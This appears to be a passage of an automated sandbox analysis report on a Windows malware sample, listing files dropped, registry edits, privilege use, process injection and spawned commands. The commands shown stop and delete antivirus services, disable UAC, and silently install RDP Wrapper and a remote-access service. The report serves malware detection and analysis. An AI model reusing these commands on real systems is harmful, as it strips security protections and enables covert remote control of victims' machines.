File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\System32\rfxvmt.dll C:\rdp\RDPWInst.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\ByteFence C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files (x86)\AVAST Software C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files (x86)\Kaspersky Lab C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files\ESET C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files\Malwarebytes C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files (x86)\AVG C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files (x86)\Panda Security C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files\Kaspersky Lab C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files\Common Files\McAfee C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.dll C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Program Files\RDP Wrapper C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Program Files (x86)\SpyHunter C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files (x86)\GRIZZLY Antivirus C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files (x86)\360 C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files\COMODO C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files\Enigma Software Group C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files\AVG C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File created C:\Program Files\Common Files\System\iediagcmd.exe C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files\Cezurity C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File created C:\Program Files\RDP Wrapper\rdpwrap.ini C:\rdp\RDPWInst.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft JDX C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files (x86)\Zaxar C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files\SpyHunter C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File created C:\Program Files\RDP Wrapper\rdpwrap.dll C:\rdp\RDPWInst.exe N/A
File opened for modification C:\Program Files\AVAST Software C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files (x86)\Cezurity C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini C:\Windows\SysWOW64\attrib.exe N/A

Launches sc.exe

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\ProgramData\Windows\winit.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\ProgramData\Windows\winit.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage C:\ProgramData\Windows\winit.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings C:\programdata\microsoft\intel\R8.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings C:\Windows\SysWOW64\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings C:\ProgramData\Microsoft\Intel\wini.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\MIME\Database C:\ProgramData\Windows\winit.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset C:\ProgramData\Windows\winit.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 C:\Programdata\RealtekHD\taskhostw.exe N/A

Runs .reg file with regedit

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\rutserv.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A
N/A N/A C:\ProgramData\Windows\winit.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Programdata\RealtekHD\taskhostw.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: SetClipboardViewer

Description Indicator Process Target
N/A N/A C:\ProgramData\Windows\rfusclient.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\icacls.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeTcbPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeTcbPrivilege N/A C:\ProgramData\Windows\rutserv.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\rdp\RDPWInst.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3840 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\ProgramData\Microsoft\Intel\wini.exe
PID 3840 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\ProgramData\Microsoft\Intel\wini.exe
PID 3840 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\ProgramData\Microsoft\Intel\wini.exe
PID 3840 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\programdata\install\cheat.exe
PID 3840 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\programdata\install\cheat.exe
PID 3840 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\programdata\install\cheat.exe
PID 2312 wrote to memory of 4488 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\Windows\SysWOW64\WScript.exe
PID 2312 wrote to memory of 4488 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\Windows\SysWOW64\WScript.exe
PID 2312 wrote to memory of 4488 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\Windows\SysWOW64\WScript.exe
PID 2312 wrote to memory of 624 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\ProgramData\Windows\winit.exe
PID 2312 wrote to memory of 624 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\ProgramData\Windows\winit.exe
PID 2312 wrote to memory of 624 N/A C:\ProgramData\Microsoft\Intel\wini.exe C:\ProgramData\Windows\winit.exe
PID 3840 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\programdata\install\ink.exe
PID 3840 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\programdata\install\ink.exe
PID 3840 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\programdata\install\ink.exe
PID 4488 wrote to memory of 3596 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 4488 wrote to memory of 3596 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 4488 wrote to memory of 3596 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 3840 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\Windows\SysWOW64\cmd.exe
PID 3840 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\Windows\SysWOW64\cmd.exe
PID 3840 wrote to memory of 3640 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\Windows\SysWOW64\cmd.exe
PID 2888 wrote to memory of 3016 N/A C:\programdata\install\cheat.exe C:\ProgramData\Microsoft\Intel\taskhost.exe
PID 2888 wrote to memory of 3016 N/A C:\programdata\install\cheat.exe C:\ProgramData\Microsoft\Intel\taskhost.exe
PID 2888 wrote to memory of 3016 N/A C:\programdata\install\cheat.exe C:\ProgramData\Microsoft\Intel\taskhost.exe
PID 3840 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\Windows\SysWOW64\cmd.exe
PID 3840 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\Windows\SysWOW64\cmd.exe
PID 3840 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\Windows\SysWOW64\cmd.exe
PID 3596 wrote to memory of 4776 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 3596 wrote to memory of 4776 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 3596 wrote to memory of 4776 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 3640 wrote to memory of 3644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 3640 wrote to memory of 3644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 3640 wrote to memory of 3644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 3016 wrote to memory of 1276 N/A C:\ProgramData\Microsoft\Intel\taskhost.exe C:\programdata\microsoft\intel\P.exe
PID 3016 wrote to memory of 1276 N/A C:\ProgramData\Microsoft\Intel\taskhost.exe C:\programdata\microsoft\intel\P.exe
PID 3016 wrote to memory of 1276 N/A C:\ProgramData\Microsoft\Intel\taskhost.exe C:\programdata\microsoft\intel\P.exe
PID 3840 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\Windows\SysWOW64\cmd.exe
PID 3840 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\Windows\SysWOW64\cmd.exe
PID 3840 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\Windows\SysWOW64\cmd.exe
PID 3416 wrote to memory of 940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 3416 wrote to memory of 940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 3416 wrote to memory of 940 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 3596 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 3596 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 3596 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\regedit.exe
PID 864 wrote to memory of 4308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 864 wrote to memory of 4308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 864 wrote to memory of 4308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 3840 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\Windows\SysWOW64\cmd.exe
PID 3840 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\Windows\SysWOW64\cmd.exe
PID 3840 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\Windows\SysWOW64\cmd.exe
PID 3596 wrote to memory of 424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3596 wrote to memory of 424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3596 wrote to memory of 424 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4184 wrote to memory of 1432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4184 wrote to memory of 1432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 4184 wrote to memory of 1432 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 3840 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\Windows\SysWOW64\cmd.exe
PID 3840 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\Windows\SysWOW64\cmd.exe
PID 3840 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\Windows\SysWOW64\cmd.exe
PID 2924 wrote to memory of 1064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2924 wrote to memory of 1064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2924 wrote to memory of 1064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 3840 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe C:\Windows\SysWOW64\cmd.exe

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe N/A

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe

"C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe"

C:\ProgramData\Microsoft\Intel\wini.exe

C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui

C:\programdata\install\cheat.exe

C:\programdata\install\cheat.exe -pnaxui

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"

C:\ProgramData\Windows\winit.exe

"C:\ProgramData\Windows\winit.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "

C:\programdata\install\ink.exe

C:\programdata\install\ink.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appidsvc

C:\ProgramData\Microsoft\Intel\taskhost.exe

"C:\ProgramData\Microsoft\Intel\taskhost.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appmgmt

C:\Windows\SysWOW64\regedit.exe

regedit /s "reg1.reg"

C:\Windows\SysWOW64\sc.exe

sc start appidsvc

C:\programdata\microsoft\intel\P.exe

C:\programdata\microsoft\intel\P.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto

C:\Windows\SysWOW64\sc.exe

sc start appmgmt

C:\Windows\SysWOW64\regedit.exe

regedit /s "reg2.reg"

C:\Windows\SysWOW64\sc.exe

sc config appidsvc start= auto

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto

C:\Windows\SysWOW64\timeout.exe

timeout 2

C:\Windows\SysWOW64\sc.exe

sc config appmgmt start= auto

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete swprv

C:\Windows\SysWOW64\sc.exe

sc delete swprv

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop mbamservice

C:\Windows\SysWOW64\sc.exe

sc stop mbamservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop bytefenceservice

C:\Windows\SysWOW64\sc.exe

sc stop bytefenceservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete bytefenceservice

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /silentinstall

C:\Windows\SysWOW64\sc.exe

sc delete bytefenceservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete mbamservice

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete crmsvc

C:\Windows\SysWOW64\sc.exe

sc delete mbamservice

C:\Windows\SysWOW64\sc.exe

sc delete crmsvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete "windows node"

C:\Windows\SysWOW64\sc.exe

sc delete "windows node"

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /firewall

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer

C:\Windows\SysWOW64\sc.exe

sc stop Adobeflashplayer

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete MoonTitle"

C:\Windows\SysWOW64\sc.exe

sc stop MoonTitle

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop AudioServer

C:\ProgramData\Windows\rutserv.exe

rutserv.exe /start

C:\Windows\SysWOW64\sc.exe

sc stop AudioServer

C:\Windows\SysWOW64\sc.exe

sc delete AdobeFlashPlayer

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop MoonTitle

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete AudioServer"

C:\Windows\SysWOW64\sc.exe

sc delete AudioServer"

C:\Windows\SysWOW64\sc.exe

sc delete MoonTitle"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"

